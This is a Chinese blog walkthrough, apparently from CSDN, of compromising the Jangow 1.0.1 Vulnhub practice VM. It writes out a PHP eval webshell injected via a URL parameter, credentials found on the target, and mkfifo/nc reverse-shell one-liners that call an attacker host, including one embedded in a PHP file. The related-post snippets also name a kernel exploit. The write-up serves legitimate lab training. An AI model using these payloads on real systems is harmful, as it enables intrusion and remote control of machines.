Vulnhub靶机:JANGOW_ 1.0.1

已于 2024-07-31 23:44:33 修改
阅读量521 收藏 3
点赞数 7
文章标签: 网络安全
于 2024-07-31 23:41:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140834882
版权

目录

前言:

一、安装虚拟机Jangow:1.0.1靶机

二、Web部分

前言:

难度:简单,本文使用VirtualBox打开,下载地址:

https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

一、安装虚拟机Jangow:1.0.1靶机

1.选择下载的Jangow: 1.0.1的文件路径。不要放C盘,不要放C盘。放在自己能记住的路径用完直接删。

2. 靶机和kali的网络都设置成仅主机模式

3. 显存改到128或256都可以。

4.打开虚拟机

二、Web部分

1.打开虚拟机后看到IP为192.168.56.118,直接浏览器访问。

2. 点击site跳转到一个网站

3. 用kali扫描下目录,同时前端页面点点点,看下功能。

4.发现wordpress地址,但未发现后台登录地址,没用,但是前端我们随便点点的时候发现一个可以传参的接口,并且可利用。

5.直接一句话上传,用蚁剑连接。

?buscar=echo '<?php @eval($_POST['cmd']);?> ' > 666.php

6.先翻翻看,发现了wordpress的账号密码,先记录下备用。

7.在HTML下发现了.backup文件,里面包含了账号密码,记录备用。

8.尝试登录frp,使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的jangow01/abygurl69,可以登陆,翻看下没有什么有用的信息。

9. 常规反弹shell失败,可能是nc 不支持 -e 参数,这个时候可以有两种解决方式:
      第一种是使用其他的nc版本如下所示:

nc.traditional <your_vps> 1024 -e /bin/sh

10. 第二种就是使用 mkfifo 命令创建命名管道反弹shell:

mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f

11. 本文使用第二种,然后访问浏览器触发式反弹shell,先使用蚁剑在/var/www/html/site/下面新建78.php文件,然后输入下方内容,注意ip换成自己ip的,另外该靶机只能用443端口。

<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 443 >/tmp/f");?>

Meet.meet
关注
jangow-01-1.0.1
qq_46140711的博客
09-22 1207
jangow-01-1.0.1靶机练习
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2735
迟到的文章,就当库存发出来吧~
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1154
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
超详细jangow-01-1.0.1靶机复现过程
weixin_67729650的博客
08-05 1215
靶机导入到最后的提权这一过程,重在思路的建立.
Vulnhub靶机jangow-01-1.0.1
qq_48904485的博客
01-03 571
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 170
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4269
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
tang502的博客
09-24 1228
如果/proc/1/cgroup文件里面可以看到docker,以及docker的hash值。从页面exec()调用命令看出他是python,所以只要建立监听,用python反弹shell。反弹shell工具:https://forum.ywhack.com/shell.php。如果根目录下存在dockerenv,那么有极大的概率,我们是在docker环境中。查看ip,如果ip与网站ip不同,那么有极大的概率,我们是在docker环境中。发现为64的系统,可连接工具Venom,进行docks配置。
vulnhub靶机jangow-01-1.0.1
最新发布
weixin_68416970的博客
08-08 613
保存下面代码为一个 php 文件,重命名为 test.php,上传到靶机的 /var/www/html/site/ 目录下。因为靶机的原因无法使用监听端口的方法传输文件,直接把 45010.c 从 kali 拖到本机桌面,再用蚁剑上传。修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)因为我 kali 的小 bug,这里输入的命令会显示双写,但是不影响命令执行。在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。
VulnHubJANGOW-01-1.0.1渗透
m0_73481504的博客
03-06 410
1.了解命令执行漏洞2.一句话木马,反弹shell3.中国蚁剑的使用4.Ubuntu 4.4.0-31漏洞利用。
jangow-01-1.0.1靶机复现
weixin_62162207的博客
07-30 299
jangow-01-1.0.1靶机复现
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 424
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
jangow-01-1.0.1 靶机渗透
braty_的博客
04-06 365
看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。
jangow-01-1.0.1靶机渗透测试
weixin_58786230的博客
07-12 219
【代码】jangow-01-1.0.1靶机渗透测试。
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4351
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3113
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值